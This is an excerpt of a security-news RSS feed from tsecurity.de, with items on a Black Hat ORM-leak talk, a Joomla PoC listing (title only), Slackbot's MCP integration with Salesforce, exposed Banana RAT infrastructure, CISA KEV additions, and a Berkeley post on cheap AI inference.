<p>TypeScript 7 will be a big upgrade, though it has taken surprisingly little time to deliver. With users like the Visual Studio Code team already building on the new release, it’s clear that beginning your own migration should be easier than you might have thought.</p>



<p>The final release is due sometime in July 2026. If you haven’t started looking at TypeScript 7, now is the time to start.</p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Black Hat Europe 2025 | ORMageddon: Leaking More Than You Joined For]]></title>
<description><![CDATA[Author: Black Hat - Bewertung: 1x - Views:11 Object Relational Mappers (ORMs) have become ubiquitous across software development, due to the ease of storing code objects on backend databases and builtin security mechanisms to protect against SQL injection. Previous security research has focused o...]]></description>
<link>https://tsecurity.de/de/3655280/it-security-video/black-hat-europe-2025-ormageddon-leaking-more-than-you-joined-for/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655280/it-security-video/black-hat-europe-2025-ormageddon-leaking-more-than-you-joined-for/</guid>
<pubDate>Wed, 08 Jul 2026 21:18:47 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Black Hat - Bewertung: 1x - Views:11 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/tJR4FirA9Nk?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Object Relational Mappers (ORMs) have become ubiquitous across software development, due to the ease of storing code objects on backend databases and builtin security mechanisms to protect against SQL injection. Previous security research has focused on the discovery of SQL injection vulnerabilities in the query builder layer of an ORM, but there has been an oversight into investigating insecure uses of an ORM.<br />
<br />
This talk is about the ORM Leak vulnerability class, where an insecure use of an ORM or exposed interface for database querying that does not validate user inputs beforehand could result in leaking out sensitive data, without the exploitation of a SQL injection vulnerability. We will cover the conditions necessary for an ORM Leak vulnerability, real world examples of ORM leaks and exploitation techniques such as relational filtering and time-based attacks.<br />
This talk will be an extension on our previous published research about ORM leaks and showcase a new susceptible ORM, how quirks of that ORM could be abused to bypass validations and how ORM leaks does not necessarily require the use of a susceptible ORM and is more often introduced by the exposure of a dangerous interface to users.<br />
<br />
By: Alex Brown  |  Senior Security Consultant I, elttam<br />
<br />
https://blackhat.com/eu-25/briefings/schedule/?#ormageddon-leaking-more-than-you-joined-for-49161<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Joomla Page Builder CK  3.5.10 -  Arbitrary File Upload]]></title>
<description><![CDATA[Joomla Page Builder CK  3.5.10 -  Arbitrary File Upload]]></description>
<link>https://tsecurity.de/de/3654472/poc/webapps-joomla-page-builder-ck-3510-arbitrary-file-upload/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654472/poc/webapps-joomla-page-builder-ck-3510-arbitrary-file-upload/</guid>
<pubDate>Wed, 08 Jul 2026 15:36:46 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Joomla Page Builder CK  3.5.10 -  Arbitrary File Upload]]></content:encoded>
</item>
<item>
<title><![CDATA[Slack’s Slackbot can now pull your CRM data, generate charts, and send DocuSigns — all from a chat message.]]></title>
<description><![CDATA[Five years and $27.7 billion after Salesforce acquired Slack, the two products are finally starting to function as a single system. On Tuesday, Slack launched an integration that connects Slackbot — the personal AI agent built into every workspace — to the entire Salesforce platform, including CR...]]></description>
<link>https://tsecurity.de/de/3654241/it-nachrichten/slacks-slackbot-can-now-pull-your-crm-data-generate-charts-and-send-docusigns-all-from-a-chat-message/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654241/it-nachrichten/slacks-slackbot-can-now-pull-your-crm-data-generate-charts-and-send-docusigns-all-from-a-chat-message/</guid>
<pubDate>Wed, 08 Jul 2026 14:18:13 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Five years and $27.7 billion after Salesforce acquired Slack, the two products are finally starting to function as a single system. On Tuesday, <a href="https://slack.com/">Slack</a> launched an integration that connects <a href="https://slack.com/features/slackbot">Slackbot</a> — the personal AI agent built into every workspace — to the entire Salesforce platform, including CRM data, Tableau analytics, Data 360 customer profiles, and a growing constellation of third-party applications, all through a single conversational prompt.</p><p>The mechanism behind the expansion is a set of dedicated <a href="https://modelcontextprotocol.io/docs/getting-started/intro">Model Context Protocol (MCP)</a> servers from Salesforce that connect Slackbot to the company's <a href="https://venturebeat.com/technology/salesforce-launches-headless-360-to-turn-its-entire-platform-into-infrastructure-for-ai-agents">Headless 360 infrastructure</a>. In practical terms, a salesperson can now ask Slackbot for a customer's deal history, receive a live Tableau visualization of pipeline trends, update a CRM record, and trigger a DocuSign approval — without ever switching tabs or logging into another application. According to Slack, the Salesforce IT team has already used this architecture to save its 1,500-plus engineers "thousands of custom coding hours annually."</p><p>The timing is not accidental. Slack is making this move amid escalating competitive pressure from Microsoft Teams, which claims <a href="https://techcommunity.microsoft.com/discussions/microsoftteams/teams-grows-to-320-million-monthly-active-users/3964746">320 million-plus monthly active users</a> and has Copilot embedded across the Office suite, and from Google, which continues to weave <a href="https://www.computerworld.com/article/4143838/google-embeds-gemini-ai-deeper-into-workspace-apps.html">Gemini deeper into Workspace</a>. And just days ago, The Information reported that some smaller companies are using Anthropic's Claude to r<a href="https://www.theinformation.com/articles/small-firms-use-claude-quit-salesforce">eplace Salesforce CRM entirely</a> — one Atlanta-based property management firm with about 55 employees reportedly saved around $100,000 annually by building a custom replacement using Claude Code and Replit.</p><p>Against that backdrop, Slack CMO Ryan Gavin sat down for an exclusive interview with VentureBeat to frame the announcement and argue that the company's future depends on an idea he calls "multiplayer AI" — and that the 25 years of customer data locked inside Salesforce is an asset no vibe-coded alternative can replicate.</p><h2><b>Why Slack's CMO believes 'multiplayer AI' is the next big enterprise battleground</b></h2><p>Gavin's core argument is that the enterprise AI conversation has been stuck in single-player mode for too long, and that Slack is uniquely positioned to break it open.</p><p>"So much of what we've seen are just these incredible tools that have largely been single-player, incredible tools for individual productivity, helping people complete tasks and write code," Gavin told VentureBeat. "But as we've always known at Slack ever since our inception, work is a team sport. For AI to really take hold in the enterprise, it has to be multiplayer."</p><p>The distinction matters commercially. Most AI assistants today — ChatGPT, Claude, Copilot — default to one-on-one conversations with a single user. A researcher queries a model, gets a response, and acts on it alone. The insight stays in a private chat window, invisible to colleagues. Gavin argues this creates a new version of the tab-switching problem that plagued pre-AI enterprise software, except now employees are also navigating dozens of individual agent interfaces on top of their existing applications.</p><p>"It's going to benefit almost no one if every enterprise application out there spawns hundreds of agent babies, and employees end up in a worse world than they were before," Gavin said.</p><p>Slack's answer is to make <a href="https://slack.com/features/slackbot">Slackbot</a> the orchestration layer. Because everything happens in shared channels, any action an agent takes — pulling a customer profile, flagging a deal risk, updating a Jira ticket — is visible to the entire team. A colleague can redirect, build on, or correct the agent's work in real time.</p><h2><b>How MCP and Salesforce's headless 360 platform power Slackbot's new capabilities</b></h2><p>The technical backbone of the announcement is the <a href="https://modelcontextprotocol.io/docs/getting-started/intro">Model Context Protocol</a>, an open standard originally developed by Anthropic that defines how AI models discover and invoke external tools. MCP has seen rapid adoption across the AI tooling ecosystem. By early 2026, it had been adopted by <a href="https://claude.com/product/claude-code">Claude Code</a>, <a href="https://cursor.com/">Cursor</a>, <a href="https://github.com/features/copilot">GitHub Copilot</a>, and OpenAI's tooling, with managed hosting available from <a href="https://aws.amazon.com/">AWS</a>, <a href="https://www.cloudflare.com/">Cloudflare</a>, and <a href="https://vercel.com/">Vercel</a>. As a <a href="https://dev.to/swrly/model-context-protocol-mcp-explained-why-it-matters-in-2026-1c7i">DEV Community explainer</a> puts it, MCP "is the closest thing the AI tooling ecosystem has to a standard."</p><p>In this implementation, Salesforce exposes its platform capabilities — CRM records, Tableau visualizations, Data 360 customer profiles, Agentforce agents — as MCP servers. Slackbot operates as an MCP client, connecting to those servers and routing user queries to the appropriate back-end system. When a user asks Slackbot about a customer, the bot discovers which MCP tools are relevant, calls them, and synthesizes the results into a single response — all within the Slack conversation.</p><p>Gavin explained the architecture in simple terms: "Salesforce is extending what has always been our open platform through our Headless 360 strategy — making all of these MCP endpoints available. And then Slackbot acts as an MCP client, connecting to those MCP servers and bringing all that data in within the confines of a trusted permission platform."</p><p>That permission layer is critical. Slackbot respects each user's Salesforce permissions, meaning a marketing coordinator cannot accidentally access sales pipeline data they are not authorized to see. Validation rules, field-level security, and org-wide data boundary configurations carry over automatically. For admins, setup requires no custom integration code — Salesforce MCP servers can be discovered, installed, and governed from a single UI using the existing Slack-Salesforce connection.</p><p>Salesforce first introduced the <a href="https://venturebeat.com/technology/salesforce-launches-headless-360-to-turn-its-entire-platform-into-infrastructure-for-ai-agents">Headless 360</a> concept at its <a href="https://www.salesforce.com/tdx/">TDX developer conference</a> in April, positioning it as an API-driven layer that exposes the platform's data, workflows, and governance controls so that software agents, rather than human users, can execute business processes directly. As <a href="http://cio.com/">CIO.com reported</a> at the time, analysts viewed the move as an effort by Salesforce "to position itself as a central layer for managing agent-driven operations across different business functions."</p><h2><b>Slack says it's betting on openness, not on any single AI protocol</b></h2><p>When asked whether Slack is making a risky bet on MCP as a protocol — given that standards in AI tooling can shift rapidly — Gavin reframed the question entirely.</p><p>"We're not betting on MCP, per se. We're betting on what we've always bet on, which is that Slack is an open platform," Gavin told VentureBeat. "MCP happens to be the best agent-to-agent protocol that the industry is rallying around right now, but if something better came out tomorrow, you'd see the same pattern from Slack — we're going to stay open. MCP and APIs are simply tools that facilitate that."</p><p>That open-platform philosophy is central to Slack's identity and, Gavin argues, its competitive differentiation. Slack already hosts <a href="https://slack.com/resources/why-use-slack/what-is-slack-and-how-does-it-work">more than 2,600 app integrations</a>. The new MCP-native partner ecosystem includes <a href="https://www.atlassian.com/">Atlassian</a>, <a href="https://www.box.com/home">Box</a>, <a href="https://www.docusign.com/">DocuSign</a>, <a href="https://www.canva.com/">Canva</a>, <a href="https://lucid.co/">Lucid</a>, <a href="https://www.zoom.com/">Zoom</a>, and more than 25 additional companies, each of whose agents can be added directly to shared Slack channels. <a href="https://www.mulesoft.com/">MuleSoft Agent</a>, now connected to Slackbot, helps manage integrations for the team — checking system health or surfacing critical error alerts in the same workspace where the team is already collaborating.</p><p>But MCP is not without trade-offs. The protocol requires tool discovery on every connection, and large tool libraries can consume significant context tokens. One technical analysis noted that a server exposing 300 tools could cost 5,000 to 10,000 tokens per session before the model does any useful work. For an enterprise like Salesforce with hundreds of potential tools across CRM, analytics, and service platforms, careful filtering and segmentation of MCP servers become essential design decisions — a challenge the company will need to navigate as the ecosystem scales.</p><h2><b>Inside Slack's complicated relationship with Anthropic and the Claude question</b></h2><p>Perhaps the most delicate topic in the interview concerned Slack's relationship with Anthropic, the AI lab behind Claude — and one of Slack's most visible power users. Just last week, <a href="https://venturebeat.com/technology/anthropic-launches-claude-tag-replacing-its-slack-app-with-a-persistent-ai-teammate-that-learns-monitors-and-works-autonomously">Anthropic launched Claude Tag</a>, a persistent AI teammate that works inside Slack channels, prompting confusion among Salesforce employees who worried it competes directly with Slackbot and Agentforce. The Information reported <a href="https://www.theinformation.com/articles/salesforce-employees-worry-anthropics-invasion-slack">internal anxiety</a> about whether Salesforce was welcoming a competitor into its own living room. Salesforce has financial reasons to maintain the partnership: the company reportedly expects to spend $300 million on Anthropic tokens this year and holds a stake in Anthropic.</p><p>Gavin addressed the tension head-on, framing it as a feature of Slack's platform strategy rather than a threat.</p><p>"We're incredibly excited and bullish about what Anthropic is bringing into Slack. Period. End of statement," Gavin said. He noted that Anthropic "is building roughly 65% of their code with Claude in Slack," and pointed out that ChatGPT was originally built in Slack, as was Perplexity.</p><p>"Building nowadays happens in the open, and every company is going to be building in the open with tools like this, and you need a platform to build in the open," Gavin said.</p><p>His argument is that feature overlap between <a href="https://slack.com/features/slackbot">Slackbot</a>, <a href="https://www.anthropic.com/news/introducing-claude-tag">Claude Tag</a>, and other third-party agents is "actually a feature, not a bug" — a sign of a healthy platform rather than a competitive vulnerability. He compared it to an ecosystem where multiple products serve similar needs but win on craftsmanship, ease of use, and integration depth.</p><p>"One of the reasons Slackbot has been the fastest-adopted feature in Salesforce history is the simplicity, the approachability — underpinned by the trust that comes from having an agent that knows me, knows my tone, knows my work, knows my people, knows my data," Gavin said.</p><p>The distinction Slack draws is structural: Slackbot has access to a user's full workspace context, Salesforce data, permissions, and connected applications by default. Claude Tag, by contrast, only sees the channels it is explicitly added to. For Slack's leadership, that asymmetry is the moat.</p><h2><b>How Slack plans to compete with Microsoft Teams and Google in the AI era</b></h2><p>Asked directly about competitive positioning against <a href="https://www.microsoft.com/en-us/microsoft-teams/log-in">Microsoft Teams</a> and <a href="https://workspace.google.com/">Google Workspace</a>, Gavin pointed to Slack's open channel architecture as the differentiator no competitor can replicate.</p><p>"If you spend any time in Teams, it's a lovely tool for chat, direct messages, and video, but it has no platform for open communication across organizations," Gavin said. "Its SharePoint-based architecture is fundamentally limiting."</p><p>He cited <a href="https://www.shopify.com/">Shopify</a> as an example, where an internal AI agent called <a href="https://www.ashgaliyev.com/shopify-river.html">River</a> is deployed across approximately 4,400 channels serving 6,000 employees. He also referenced a <a href="https://fortune.com/2026/06/27/microsoft-copilot-boss-jacob-andreou-tapped-by-satya-nadella-to-save-ai-strategy/">Fortune report</a> noting that Microsoft's own head of AI mandated that his team run on Slack rather than Teams — a pointed detail Gavin clearly relished. "There's a reason for that," he said. "We're in an era right now where openness matters, and all the other tools you mentioned, they're still relatively closed."</p><p>The competitive pressure is real and intensifying. Microsoft has integrated Copilot across its entire productivity suite, giving it a distribution advantage that reaches virtually every Fortune 500 company. Google has been similarly aggressive with Gemini across Workspace. And new entrants are crowding the market: a startup called <a href="https://viktor.com/hire-an-ai-employee?gad_source=1&amp;gad_campaignid=23610878065&amp;gbraid=0AAAABC9uvB--JiQPb5do0TpcAnPyKB3Gz&amp;gclid=CjwKCAjwx7LSBhB3EiwAjcodxAmoASmBycYGHkrfafr1WOuFKNG5AQYQLWLmYZLmc1diiKMM0wOKARoCa1sQAvD_BwE">Viktor</a>, which embeds AI agents inside Slack and Teams workspaces, recently raised a <a href="https://viktor.com/blog/viktor-series-a">$75 million Series A</a> led by Accel — with Slack cofounders Stewart Butterfield and Cal Henderson participating as angel investors.</p><p><a href="https://www.box.com/home">Box</a>, one of the enterprise customers highlighted in the announcement, told Slack it aims to have its sellers complete 75 to 80 percent of their work inside Slack. Gavin repeated that figure as evidence that the platform is becoming the default workspace for entire organizations, not just engineering teams — a shift he believes accelerates as AI makes every employee a builder.</p><h2><b>Slack's biggest long-term play is making Salesforce's CRM useful to everyone in the company</b></h2><p>Gavin saved what he considers the most underappreciated element of the announcement for last: the democratization of Salesforce's CRM.</p><p>For 25 years, Salesforce's CRM has been used primarily by sales, service, and marketing professionals — a relatively modest percentage of a company's total workforce. The promise of Slackbot as a conversational interface is that any employee, regardless of their role or technical fluency, can now query and act on CRM data simply by asking a question in natural language.</p><p>"What most people don't realize is that this democratization of CRM is going to take its usage from a modest percentage of employees to the entire enterprise," Gavin said. "When you can make systems like Data 360 or Agentforce for Sales accessible to the entire employee base — not just a percentage — think about how much more valuable those investments become."</p><p>He cited <a href="https://engine.com/">Engine</a>, a company that handles 800,000 customer inquiries a year, as an example. Previously, answering a customer inquiry required a specific employee with access to a specific tool to look up a customer's history. Now, anyone in the company can ask Slackbot and see a complete customer profile, review case history, and write updates — all without being retrained or learning a new interface. Engine's CEO Elia Wallen, in a statement sent to VentureBeat, described the integration as enabling employees to "make data-driven decisions and take action without leaving the conversation."</p><p>The financial logic is straightforward: if Salesforce can make its platform useful to 100 percent of a customer's workforce rather than the 20 or 30 percent who currently hold licenses, the value of the existing Salesforce investment multiplies without requiring a proportional increase in spending. That pitch becomes especially potent at a time when CIOs are scrutinizing every line of their AI budgets.</p><h2><b>What analysts and CIOs should watch as Slack rolls out its biggest AI update yet</b></h2><p>The announcement is a significant architectural evolution for Slack, but several questions remain unanswered.</p><p>First, pricing. The company did not directly address whether Slackbot's MCP-powered Salesforce integration will require additional SKUs or license tiers. As Info-Tech Research Group analyst Scott Bickley <a href="https://www.cio.com/article/4178840/salesforces-headless-360-monetization-play-could-give-cios-a-familiar-budgeting-headache.html">cautioned</a> when Headless 360 was first announced in April, "Salesforce's MO seems to be to announce new capabilities that require SKUs. CIOs should be asking about pricing now."</p><p>Second, performance. Routing user queries through MCP servers to Salesforce back-end systems introduces latency that could affect the conversational feel Slack prides itself on. Neither the press release nor the interview disclosed SLAs for MCP tool calls — a gap that enterprise buyers will want addressed.</p><p>Third, the competitive dynamics of the platform play. Slack's open-platform philosophy invites powerful partners like <a href="https://www.anthropic.com/">Anthropic</a> and <a href="https://openai.com/">OpenAI</a> into its ecosystem, but those same partners are building their own surfaces for enterprise work. Anthropic reportedly plans to expand Claude Tag to Microsoft Teams, email, and other project management tools — meaning the partner Salesforce is paying hundreds of millions a year is building the infrastructure to be useful without Slack at all.</p><p>And fourth, the broader existential question facing all enterprise software: whether AI agents will ultimately reduce the need for CRM systems entirely. Gavin's pitch — that Slack makes CRM more valuable by making it more accessible — is the inverse of the bear case. The market will ultimately decide which thesis prevails.</p><p>Salesforce reported record first-quarter revenue of <a href="https://investor.salesforce.com/news/news-details/2026/Salesforce-Delivers-Record-First-Quarter-Fiscal-2027-Results/default.aspx">$11.1 billion in fiscal Q1 2027</a>, with <a href="https://investor.salesforce.com/news/news-details/2026/Salesforce-Delivers-Record-First-Quarter-Fiscal-2027-Results/default.aspx">Agentforce ARR surpassing $1 billion</a> for the first time and combined AI and data ARR reaching $3.4 billion. Those numbers suggest the AI strategy is beginning to generate real revenue, even as the company navigates a market that remains uncertain about the long-term trajectory of legacy enterprise software.</p><p>"Slack has quickly moved from this beloved collaboration tool from the last ten years to now this multiplayer AI platform that we call a work operating system," Gavin said.</p><p>Five years ago, <a href="https://www.cnbc.com/2020/12/01/salesforce-buys-slack-for-27point7-billion-in-cloud-companys-largest-deal.html">Salesforce paid $27.7 billion</a> for what was, at its core, a very good group chat application. On Wednesday, it started trying to prove that group chat was never the product — it was the foundation. In the age of AI agents, the most valuable real estate in enterprise software may not be the database where the data lives. It may be the conversation where the decisions get made.</p><p>
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Exposed Banana RAT Infrastructure Reveals Payload Generator and Obfuscator Tooling]]></title>
<description><![CDATA[A publicly indexed server at 198[.]245[.]53[.]26, discovered via Shodan, exposed more than simple staging files it revealed an active payload-generation backend and obfuscation tooling tied to two distinct Banana RAT branches. The host served static stages (st.txt, payload.php) and a FastAPI-base...]]></description>
<link>https://tsecurity.de/de/3654014/it-security-nachrichten/exposed-banana-rat-infrastructure-reveals-payload-generator-and-obfuscator-tooling/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654014/it-security-nachrichten/exposed-banana-rat-infrastructure-reveals-payload-generator-and-obfuscator-tooling/</guid>
<pubDate>Wed, 08 Jul 2026 12:53:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A publicly indexed server at 198[.]245[.]53[.]26, discovered via Shodan, exposed more than simple staging files it revealed an active payload-generation backend and obfuscation tooling tied to two distinct Banana RAT branches. The host served static stages (st.txt, payload.php) and a FastAPI-based builder (servidor_completo_pool.py) plus an ofuscador.py helper. Enabling researchers to compare an older ETW-themed branch […]</p>
<p>The post <a href="https://gbhackers.com/exposed-banana-rat-infrastructure/">Exposed Banana RAT Infrastructure Reveals Payload Generator and Obfuscator Tooling</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CISA nimmt vier aktiv ausgenutzte Schwachstellen in die KEV-Liste auf]]></title>
<description><![CDATA[WASHINGTON / LONDON (IT BOLTWISE) – CISA ergänzt vier Schwachstellen mit Nachweis aktiver Ausnutzung in den KEV-Katalog. Unter den Einträgen sind hochkritische Probleme in Adobe ColdFusion sowie Joomla Page Builder, die direkt in RCE- und Webshell-Szenarien münden können. Besonders bei Langflow d...]]></description>
<link>https://tsecurity.de/de/3653966/it-security-nachrichten/cisa-nimmt-vier-aktiv-ausgenutzte-schwachstellen-in-die-kev-liste-auf/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653966/it-security-nachrichten/cisa-nimmt-vier-aktiv-ausgenutzte-schwachstellen-in-die-kev-liste-auf/</guid>
<pubDate>Wed, 08 Jul 2026 12:22:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-kev-cybersecurity-dashboard-patching.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-kev-cybersecurity-dashboard-patching.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-kev-cybersecurity-dashboard-patching-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-kev-cybersecurity-dashboard-patching-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-kev-cybersecurity-dashboard-patching-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-kev-cybersecurity-dashboard-patching-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-kev-cybersecurity-dashboard-patching-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">WASHINGTON / LONDON (IT BOLTWISE) – CISA ergänzt vier Schwachstellen mit Nachweis aktiver Ausnutzung in den KEV-Katalog. Unter den Einträgen sind hochkritische Probleme in Adobe ColdFusion sowie Joomla Page Builder, die direkt in RCE- und Webshell-Szenarien münden können. Besonders bei Langflow dreht sich die Lage um einen IDOR-Vektor, der Zugriff über Mandantengrenzen hinweg auf Flows […]</p>
<div><a href="https://www.it-boltwise.de/cisa-nimmt-vier-aktiv-ausgenutzte-schwachstellen-in-die-kev-liste-auf.html">... den vollständigen Artikel <strong>»CISA nimmt vier aktiv ausgenutzte Schwachstellen in die KEV-Liste auf«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/cisa-nimmt-vier-aktiv-ausgenutzte-schwachstellen-in-die-kev-liste-auf.html">CISA nimmt vier aktiv ausgenutzte Schwachstellen in die KEV-Liste auf</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[U.S. CISA adds Adobe ColdFusion, Joomlack Page Builder, Langflow, and JoomShaper SP Page Builder flaws to its Known Exploited Vulnerabilities catalog]]></title>
<description><![CDATA[U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Adobe ColdFusion, Joomlack Page Builder, Langflow, and JoomShaper SP Page Builder flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added [1, 2] Adobe ColdFusion,...]]></description>
<link>https://tsecurity.de/de/3653758/it-security-nachrichten/us-cisa-adds-adobe-coldfusion-joomlack-page-builder-langflow-and-joomshaper-sp-page-builder-flaws-to-its-known-exploited-vulnerabilities-catalog/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653758/it-security-nachrichten/us-cisa-adds-adobe-coldfusion-joomlack-page-builder-langflow-and-joomshaper-sp-page-builder-flaws-to-its-known-exploited-vulnerabilities-catalog/</guid>
<pubDate>Wed, 08 Jul 2026 11:09:14 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Adobe ColdFusion, Joomlack Page Builder, Langflow, and JoomShaper SP Page Builder flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added [1, 2] Adobe ColdFusion, Joomlack Page Builder, Langflow, and JoomShaper SP Page Builder flaws to its Known Exploited Vulnerabilities (KEV) catalog. […]]]></content:encoded>
</item>
<item>
<title><![CDATA[CISA Adds Three Known Exploited Vulnerabilities to Catalog]]></title>
<description><![CDATA[CISA has added three new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.

CVE-2026-48908 JoomShaper SP Page Builder Unrestricted Upload of File with Dangerous Type Vulnerability
CVE-2026-55255 Langflow Authorization Bypass Through Us...]]></description>
<link>https://tsecurity.de/de/3652485/it-security-nachrichten/cisa-adds-three-known-exploited-vulnerabilities-to-catalog/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652485/it-security-nachrichten/cisa-adds-three-known-exploited-vulnerabilities-to-catalog/</guid>
<pubDate>Tue, 07 Jul 2026 20:22:03 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>CISA has added three new vulnerabilities to its <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog">Known Exploited Vulnerabilities (KEV) Catalog</a>, based on evidence of active exploitation.</p>
<ul>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2026-48908" target="_blank">CVE-2026-48908</a> JoomShaper SP Page Builder Unrestricted Upload of File with Dangerous Type Vulnerability</li>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2026-55255" target="_blank">CVE-2026-55255</a> Langflow Authorization Bypass Through User-Controlled Key Vulnerability  </li>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2026-56290" target="_blank">CVE-2026-56290</a> Joomlack Page Builder Improper Access Control Vulnerability</li>
</ul>
<p>These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risks to the federal enterprise.</p>
<p><a href="https://www.cisa.gov/news-events/directives/bod-26-04-implementation-guidance-prioritizing-security-updates-based-risk">Binding Operational Directive (BOD) 26-04: Prioritizing Security Updates Based on Risk</a> establishes vulnerability management requirements for Federal Civilian Executive Branch (FCEB) agencies. BOD 26-04 reinforces the importance of the KEV Catalog and requires federal agencies to prioritize rapid remediation of high-risk vulnerabilities, specifically those identified by Common Vulnerabilities and Exposures (CVEs) listed in CISA’s KEV Catalog on publicly exposed assets that grant total control of the asset post-exploitation, while deferring action for lower-risk vulnerabilities. BOD 26-04 further establishes basic expectations for when agencies must check whether threat actors compromised the system before the patch was applied.</p>
<p>While BOD 26-04 applies only to FCEB agencies, CISA encourages all organizations to adopt risk-based vulnerability management and prioritize remediation of <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog">KEV Catalog vulnerabilities</a>. CISA will continue to add vulnerabilities to the catalog that meet the <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog/reducing-significant-risk-known-exploited-vulnerabilities">specified criteria</a>.</p>
<p>Aware of an exploited vulnerability not currently listed in the KEV Catalog? Submit it for potential addition through CISA’s <a href="https://cisasurvey.gov1.qualtrics.com/jfe/form/SV_1Zwu52kgK2OYf3w" target="_blank">KEV Nomination Form</a>. Potential KEV additions must have a CVE ID, evidence of exploitation, and clear mitigation guidance. </p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Intelligence is Free, Now What?  Data Systems for, of, and by Agents]]></title>
<description><![CDATA[... government of the people, by the people, for the people ...
    — Abraham Lincoln, Gettysburg Address (1863)


The cost of AI is dropping rapidly. GPT-4-class capabilities cost roughly $30 per million tokens in early 2023; today the same runs under $1, and some providers are pushing costs bel...]]></description>
<link>https://tsecurity.de/de/3652331/ai-nachrichten/intelligence-is-free-now-what-data-systems-for-of-and-by-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652331/ai-nachrichten/intelligence-is-free-now-what-data-systems-for-of-and-by-agents/</guid>
<pubDate>Tue, 07 Jul 2026 19:19:05 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- twitter -->












<p>
<i>... government of the people, by the people, for the people ...</i><br>
    — Abraham Lincoln, Gettysburg Address (1863)
</p>

<p>The cost of AI is dropping rapidly. GPT-4-class capabilities cost roughly <span class="tex2jax_ignore">$30</span> per million tokens in early 2023; today the same runs under <span class="tex2jax_ignore">$1</span>, and <a href="https://zuplo.com/learning-center/the-10x-cheaper-ai-era-api-pricing-strategy-obsolete">some providers are pushing costs below <span class="tex2jax_ignore">$0.10</span></a>. Across benchmarks, <a href="https://epochai.org/data-insights/llm-inference-price-trends">inference prices have fallen between 9x and 900x per year</a>, with a median decline near 50x. Even <a href="https://tokenmix.ai/blog/ai-pricing-trends-history">frontier models are getting dramatically cheaper</a> each generation, with open-source models following closely behind. And crucially, even if “Nobel-Prize-winning genius-level” intelligence isn’t here yet, the intelligence that suffices for the vast majority of knowledge work is here today, and getting cheaper by the month. <strong>At this rate, we are soon entering the era of virtually free intelligence</strong>—the kind that is more than enough for everyday knowledge work.</p>

<p>
<img src="https://bair.berkeley.edu/static/blog/intelligence-is-free-now-what/image6.png" alt="A cartoon database character and an AI robot agent holding hands" width="450">
</p>

<!--more-->

<p>
Disclosure: This post is a perspective led by <a href="https://people.eecs.berkeley.edu/~adityagp/">Aditya G. Parameswaran</a>—an Associate Professor of EECS and co-director of the EPIC Data Lab at UC Berkeley—together with his collaborators. It is part landscape survey and part perspective, and several of the research directions discussed below (including agentic speculation, structured memory, and synthesizing custom data systems from scratch) draw on the authors' own ongoing work.
</p>

<p>So, what does this new era of near-free intelligence mean for data systems? We believe three new challenges—and opportunities—stem from near-zero inference costs:</p>

